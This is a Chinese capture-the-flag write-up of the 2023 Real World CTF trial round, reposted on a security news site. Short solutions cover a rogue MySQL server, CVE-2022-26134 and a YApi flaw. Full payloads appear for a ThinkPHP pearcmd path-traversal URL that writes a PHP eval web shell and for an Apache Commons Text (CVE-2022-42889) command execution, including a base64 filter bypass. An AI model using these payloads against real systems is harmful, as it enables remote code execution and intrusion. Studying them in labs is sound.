2023 Real World CTF 体验赛wp

admin 2023年1月11日17:52:25CTF专场评论46 views1031字阅读3分26秒阅读模式

misc

🐑了拼🐑

游戏类题目,直接打开js文件搜索rwctf,发现flag2023 Real World CTF 体验赛wp

rwctf{wellcome_to_the_rwctf!}

web

Evil MySQL Server

Mysql 服务器任意读取客户端文件

使用rogue_mysql_server构造恶意mysql服务器https://github.com/rmb122/rogue_mysql_server

配置好文件后,启动服务器,然后客户端连接得到flag文件2023 Real World CTF 体验赛wp

Be-a-Language-Expert

thinkphp lang rce

直接写shell

http://47.98.124.175:8080/?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/<?[email protected]eval($_POST['cmd']);?>+/tmp/shell.php

2023 Real World CTF 体验赛wp然后文件包含2023 Real World CTF 体验赛wp执行命令反弹到vps,执行命令./readflag得到flag

Be-a-Wiki-Hacker

cve-2022-261342023 Real World CTF 体验赛wp

Yummy Api

YApi 接口管理平台 up SQL注入到rce漏洞

2023 Real World CTF 体验赛wp

ApacheCommandText

Apache Commons Text RCE(CVE-2022-42889)漏洞构造io流读取exec执行./readflag的内容

${script:javascript:new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("./readflag").getInputStream())).readLine()}

题目过滤了 file dns script url

使用base64Decoder进行绕过

${base64Decoder:JHtzY3JpcHQ6amF2YXNjcmlwdDpuZXcgamF2YS5pby5CdWZmZXJlZFJlYWRlcihuZXcgamF2YS5pby5JbnB1dFN0cmVhbVJlYWRlcihqYXZhLmxhbmcuUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYygiLi9yZWFkZmxhZyIpLmdldElucHV0U3RyZWFtKCkpKS5yZWFkTGluZSgpfQ==}

2023 Real World CTF 体验赛wp


原文始发于微信公众号(闪焰安全服务团队):2023 Real World CTF 体验赛wp

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月11日17:52:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  2023 Real World CTF 体验赛wp https://cn-sec.com/archives/1513132.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: